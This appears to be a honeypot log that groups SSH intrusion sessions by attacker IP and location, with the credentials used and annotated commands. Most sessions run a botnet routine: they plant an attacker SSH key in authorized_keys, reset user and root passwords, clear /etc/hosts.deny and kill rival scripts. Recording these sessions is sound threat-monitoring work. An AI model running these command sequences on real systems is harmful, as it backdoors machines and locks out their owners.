$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crumpet_root_2 (212.227.125.15) β€” Worcester, United Kingdom Β· 2 sessions Β· 40 cmds
2026-05-28 22:42 EDT Β· as guest/guest123, kevin/kevin123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "guest123\nVUS5Ei1INggF\nVUS5Ei1INggF"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "guest123\nVUS5Ei1INggF\nVUS5Ei1INggF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "kevin123\nGz39Wm0ldobe\nGz39Wm0ldobe"|passwd|bash
$ echo "kevin123\nGz39Wm0ldobe\nGz39Wm0ldobe\n"|passwd
🎭 rogue_root_53 (103.189.208.13) β€” SΖ‘n TrΓ , Vietnam Β· 3 sessions Β· 60 cmds
2026-05-04 07:52 EDT Β· as kevin/kevin123, ubuntu/3333333, ubuntu/system
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "kevin123\nvjlTsQnAQDHT\nvjlTsQnAQDHT"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "kevin123\nvjlTsQnAQDHT\nvjlTsQnAQDHT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "system\n0Seo5U3cJCrh\n0Seo5U3cJCrh"|passwd|bash
$ echo "system\n0Seo5U3cJCrh\n0Seo5U3cJCrh\n"|passwd
$ echo -e "3333333\n5IefWkSmRofJ\n5IefWkSmRofJ"|passwd|bash
$ echo "3333333\n5IefWkSmRofJ\n5IefWkSmRofJ\n"|passwd
🎭 sensei_root_5 (160.251.101.169) β€” Chiyoda City, Japan Β· 2 sessions Β· 39 cmds
2026-05-17 15:51 EDT Β· as adminsys/123, root/!@#123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123\nEwUgqxvhYfJ4\nEwUgqxvhYfJ4"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nEwUgqxvhYfJ4\nEwUgqxvhYfJ4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:OZpMXr66aIhM"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 eagle_root_24 (172.172.180.124) β€” Boydton, United States Β· 1 session Β· 18 cmds
2026-05-28 21:26 EDT Β· as root/matrimonio
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Hhytk9nXEC4N"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
🎭 ghost_root_65 (103.189.234.9) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-28 20:48 EDT Β· as root/123qwe456rty, root/Test_123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:iWg5hi0dgBPo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:eKXravLtHRWE"|chpasswd|bash
🎭 samba_root_4 (170.238.160.191) β€” Salvador, Brazil Β· 1 session Β· 19 cmds
2026-05-28 20:53 EDT Β· as root/585858
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:UAT9J0Qodlmo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_50 (103.172.236.241) β€” Đống Đa, Vietnam Β· 4 sessions Β· 43 cmds
2026-05-27 15:41 EDT Β· as git/123123, netflow/netflow2025, root/Test_123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:j4mEEXQHL2lu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123123\nH5nh7awSv9gm\nH5nh7awSv9gm"|passwd|bash
$ Enter new UNIX password:
$ echo "123123\nH5nh7awSv9gm\nH5nh7awSv9gm\n"|passwd
🎭 rogue_root_54 (196.196.150.124) β€” Valencia, Spain Β· 1 session Β· 19 cmds
2026-05-28 20:37 EDT Β· as root/123qwe456rty
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cO8IMkYLEyJx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_55 (58.186.20.101) β€” Ho Chi Minh City, Vietnam Β· 2 sessions Β· 39 cmds
2026-05-14 06:42 EDT Β· as root/2069, samuel/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123\n79sHgiERnwlY\n79sHgiERnwlY"|passwd|bash
$ Enter new UNIX password:
$ echo "123\n79sHgiERnwlY\n79sHgiERnwlY\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:Xi9cF7Y4Z7pV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 specter_root_14 (79.36.191.212) β€” Rome, Italy Β· 2 sessions Β· 39 cmds
2026-05-24 14:13 EDT Β· as root/p@$$W0rd, samuel/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123\nDQfOrb8xAqfb\nDQfOrb8xAqfb"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nDQfOrb8xAqfb\nDQfOrb8xAqfb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:BDf244mNCRLm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 hanbok_root_3 (220.118.173.234) β€” Yeongdeungpo-gu, South Korea Β· 4 sessions Β· 79 cmds
2026-05-11 10:36 EDT Β· as curl/welltech12, root/admin911, samuel/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "123\nN1i6JD5cbiQC\nN1i6JD5cbiQC"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "123\nN1i6JD5cbiQC\nN1i6JD5cbiQC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "welltech12\nJRDX0lkOIh1n\nJRDX0lkOIh1n"|passwd|bash
$ echo "welltech12\nJRDX0lkOIh1n\nJRDX0lkOIh1n\n"|passwd
$ echo "root:Pu1D96bldxaV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "qweQWE123\nJaDpFE678mI6\nJaDpFE678mI6"|passwd|bash
$ echo "qweQWE123\nJaDpFE678mI6\nJaDpFE678mI6\n"|passwd
🎭 ghost_root_66 (95.216.57.97) β€” Helsinki, Finland Β· 1 session Β· 20 cmds
2026-05-28 18:56 EDT Β· as samuel/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nglnOiqKj8e1W\nglnOiqKj8e1W"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nglnOiqKj8e1W\nglnOiqKj8e1W\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_12 (49.207.240.133) β€” Bengaluru, India Β· 1 session Β· 20 cmds
2026-05-28 18:52 EDT Β· as parth/parth@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "parth@123\n9I3dKqArwAI0\n9I3dKqArwAI0"|passwd|bash
$ Enter new UNIX password:
$ echo "parth@123\n9I3dKqArwAI0\n9I3dKqArwAI0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
